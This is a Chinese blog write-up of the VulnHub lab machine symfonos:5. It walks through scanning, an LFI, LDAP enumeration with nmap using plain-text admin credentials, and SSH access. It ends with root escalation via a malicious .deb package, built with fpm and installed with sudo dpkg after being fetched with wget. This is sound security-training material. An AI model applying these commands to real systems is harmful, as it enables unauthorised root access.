oscp——symfonos:5

0x00 前言

这个是vulnhub的第十一台机子,其实之前在做ReconForce-01但是由于vmbox机子的问题,导致没有弄出来。所以就转手来做这个

链接

https://www.vulnhub.com/entry/symfonos-5,415/

0x01 信息收集

ip信息收集

在这里插入图片描述

端口信息收集

在这里插入图片描述

0x02 攻击

1.端口

这里开放了22,80,389,636,由于多次做题的经验,不直接进行ssh爆破
这里的ldap信息如下
在这里插入图片描述

2.web

这里从web进行切入,访问后可以看到一个界面,但是什么都没有
在这里插入图片描述
我这里使用dirb进行目录爆破
在这里插入图片描述
这里可以看到重要的有连个,一个是admin.php,另外一个就是home.php

admin.php
在这里插入图片描述
home.php
在burp的site里看到这个猜测可能是存在LFI
在这里插入图片描述
这里进行测试,发现真实存在
在这里插入图片描述
然后这里按照经验可以进行一下fuzz查找,可以看到admin的源码 在这里插入图片描述
到这里对我来说已经到这里结束了,所以借鉴大佬的方法,可以使用nmap或者jxplorer。
这里nmap直接使用脚本。

nmap 192.168.0.112 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"'

在这里插入图片描述
使用jxplorer
在这里插入图片描述
获取到账号密码,使用ssh进行登录
在这里插入图片描述
sudo -l查看是否有可执行权限的文件
在这里插入图片描述
这里使用dpkg进行提权

添加国内源:

gem sources -a http://mirrors.aliyun.com/rubygems/

移除国外源:

gem sources --remove http://rubygems.org/

安装FPM工具:

gem install fpm

cd ignite/

echo "">shell.sh

vim shell.sh
#!/bin/bash
/bin/bash
:wq进行保存

fpm -s dir -t deb -n exploit --before-install shell.sh ./
python -m SimpleHTTPServer

wget http://192.168.25.172:8000/exploit_1.0_amd64.deb
sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb

最后拿到flag
在这里插入图片描述

0x03 总结

主要这里的ldap是一个陌生的内容,正好这里学习,然后就是dpkg提取的方法

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页